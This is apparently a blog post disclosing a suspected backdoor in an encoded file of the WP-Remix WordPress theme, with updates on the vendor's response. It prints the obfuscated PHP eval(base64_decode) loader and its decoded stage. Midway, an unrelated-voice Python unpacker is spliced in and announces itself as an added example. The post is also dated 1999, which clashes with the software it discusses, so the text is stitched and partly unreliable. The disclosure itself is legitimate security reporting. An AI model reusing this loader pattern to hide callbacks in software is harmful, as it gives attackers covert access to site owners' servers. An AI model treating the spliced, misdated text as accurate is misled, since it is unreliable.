
This summer, R.Bhavesh released his new version of the WordPress theme WP-Remix. A good friend of mine who wishes to remain anonymous bought a developer license of this theme/script WordPress software. It seems to be a very nice way to turn your WordPress blog into more of a CMS. My friend liked it so much that he has been trying to get me to buy a license myself, using his “affiliation” link (gee, go figure :P). But I have been a little hesitant.

I asked my friend if I could have a copy to test it out on my local test server. After receiving a copy, my antivirus scanner gave me a malware warning. My friend told me this was just a “bug” and that it had been clarified on the WP-Remix support forums.

My NOD32 AV scanner reported the malware in the file remix-advanced_editor.php, and only in this file. The file is also encoded. This got me a little bit worried, and I decided to decode the file and check it myself. After a proper decode of the file and going through the code, I found something disturbing: a hidden callback function that could be used as a backdoor.

Here is the encoded part which is at the bottom of the file:

Pg==';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));?>

And here is what it decodes into (I have [removed] the password for security reasons):

$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','[removed]');$_R=ereg_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;
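The decode described above can be done mechanically rather than by hand. The following is an added example, not code from the original post or from WP-Remix: it unpacks this kind of two-stage loader (an outer `eval(base64_decode('...'))` that reveals a short PHP stage, which in turn base64-decodes `$_X`, undoes a fixed character substitution with `strtr()`, substitutes the loader's own path for `__FILE__`, and `eval()`s the result) while replacing every `eval()` with plain string handling, so nothing from the file is ever executed. The sample loader, the harmless payload inside it and the substitution table are all constructed for the example; the real second `strtr()` argument was redacted by the author and is not used here.

```python
"""Offline unpacker for an eval(base64_decode(...)) / strtr() PHP loader.

Added example, not code from the original post or from WP-Remix.
The sample loader and the substitution table below are CONSTRUCTED;
the author redacted the real table and it is not reproduced here.
"""
import base64
import re

# Constructed substitution table. Like the one in the quoted stub it is an
# involution (each character maps to its partner and back), so the same
# table both obfuscates and deobfuscates.
FROM_CHARS = "abcdef012345"
TO_CHARS = "012345abcdef"


def php_strtr(text: str, from_chars: str, to_chars: str) -> str:
    """Python equivalent of PHP strtr($s, $from, $to) for equal-length
    tables: a simultaneous, single-pass character substitution."""
    if len(from_chars) != len(to_chars):
        raise ValueError("strtr tables must be the same length")
    return text.translate(str.maketrans(from_chars, to_chars))


def decode_payload(payload_b64: str, from_chars: str, to_chars: str,
                   script_path: str) -> str:
    """The stage-1 stub without its eval(): base64 -> strtr -> replace
    the __FILE__ token with the quoted path of the loader file."""
    # b64decode() silently drops whitespace that line wrapping inserted.
    raw = base64.b64decode(payload_b64).decode("latin-1")
    src = php_strtr(raw, from_chars, to_chars)
    # Mirrors ereg_replace('__FILE__', "'".$_F."'", $_X) in the stub.
    return src.replace("__FILE__", "'" + script_path + "'")


def encode_payload(source: str, from_chars: str, to_chars: str) -> str:
    """Inverse of decode_payload(); used here only to build the sample."""
    obf = php_strtr(source, to_chars, from_chars)
    return base64.b64encode(obf.encode("latin-1")).decode("ascii")


def stage1_stub(from_chars: str, to_chars: str) -> str:
    """PHP stage-1 stub in the same shape as the one quoted in the post."""
    return ("$_X=base64_decode($_X);$_X=strtr($_X,'%s','%s');"
            "$_R=ereg_replace('__FILE__',\"'\".$_F.\"'\",$_X);"
            "eval($_R);$_R=0;$_X=0;" % (from_chars, to_chars))


def build_sample_loader(source: str) -> str:
    """Constructed loader in the $_F=__FILE__;$_X='...';eval(...) shape."""
    payload = encode_payload(source, FROM_CHARS, TO_CHARS)
    stub = base64.b64encode(
        stage1_stub(FROM_CHARS, TO_CHARS).encode("ascii")).decode("ascii")
    return ("<?php $_F=__FILE__;$_X='%s';eval(base64_decode('%s'));?>"
            % (payload, stub))


def unpack_loader(loader_text: str, script_path: str) -> dict:
    """Recover the stage-1 stub, its strtr() table and the final source
    from a loader file, with every eval() replaced by string handling."""
    m_stub = re.search(r"eval\(base64_decode\('([^']+)'\)\)", loader_text)
    m_x = re.search(r"\$_X='([^']+)'", loader_text)
    if not (m_stub and m_x):
        raise ValueError("loader shape not recognised")
    stub = base64.b64decode(m_stub.group(1)).decode("latin-1")
    m_tr = re.search(r"strtr\(\$_X,'([^']*)','([^']*)'\)", stub)
    if not m_tr:
        raise ValueError("no strtr() table in stage-1 stub")
    from_chars, to_chars = m_tr.group(1), m_tr.group(2)
    return {
        "stub": stub,
        "table": (from_chars, to_chars),
        "source": decode_payload(m_x.group(1), from_chars, to_chars,
                                 script_path),
    }


if __name__ == "__main__":
    # Constructed, harmless payload; a real one could contain anything.
    sample_src = "<?php echo 'loaded from '.__FILE__; ?>"
    loader = build_sample_loader(sample_src)
    result = unpack_loader(loader, "/var/www/wp-content/themes/x/editor.php")
    print(result["stub"])
    print(result["source"])
```

Run it against a real file by reading the loader text and passing the file's on-disk path as `script_path`; the recovered source is returned as a string for review and never executed. Note that `ereg_replace()` in the stub was deprecated in PHP 5.3 and removed in PHP 7, so stubs of this shape stop working on current PHP regardless of their contents.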

I had no trouble using this callback function as a backdoor into my local WordPress installation, and to verify it I got my friend’s permission to try his sites as well. All of them were easily penetrated. Either the creator of the theme made this to penetrate sites that illegally use his theme/script without a license, or maybe someone has penetrated his distribution software. I have no clue what the reason could be.

I tried sending two emails to WP-Remix about this over the past two weeks, but there has still been no reply. I tried to make a post on their support forum to show the discovery, but the thread got deleted twice. Then another user of the forum wanted to know why they deleted the thread, and his thread got deleted as well.
So it seems like they are trying their best to keep this under wraps. Because of this I have no choice but to write about the findings on my official blog instead.

To be continued

Update

WP-Remix support personnel seem to have taken the issue more seriously. R.Bhavesh mentions that all my claims are false. I can’t blame him, but the callback function is there for anyone to see. The encoded file is very easy to decode, and I suggest they use something more secure in the future. It’s not much money to invest in a proper Zend or ionCube encoder, and it might benefit them in the long run. When the new file comes out, I will most likely get a copy of it from my friend and attempt to decode it again to check for changes. If they encode it properly, I might not be able to decode it. But time will tell.

After reading up on various topics on the WP-Remix support forum, I do not think this was intentional by WP-Remix. Most likely it is a bad security flaw which they are now trying to correct. Support personnel are answering questions on the forum on a daily basis, helping users, and they seem to be doing a good job.
If the next release of the file is a bit more secure, I might even end up getting myself a license, since I really like the idea of WP-Remix, and got quite fond of it by doing some internal testing on my local web-server.

2nd Update

Some have asked me to repost the part of the file with the code in question, but I would like to honor R.Bhavesh’s request not to post it. The code is a security risk until WP-Remix have released an update to the encoded remix-advanced_editor.php.

If you want to follow the progress of WP-Remix efforts in fixing this, please head over to their support forum. You can find the ongoing discussion in the following thread.

3rd Update

I have made a new update post about the new remix editor file here.

Oct 22nd, 1999 | Posted in Uncategorized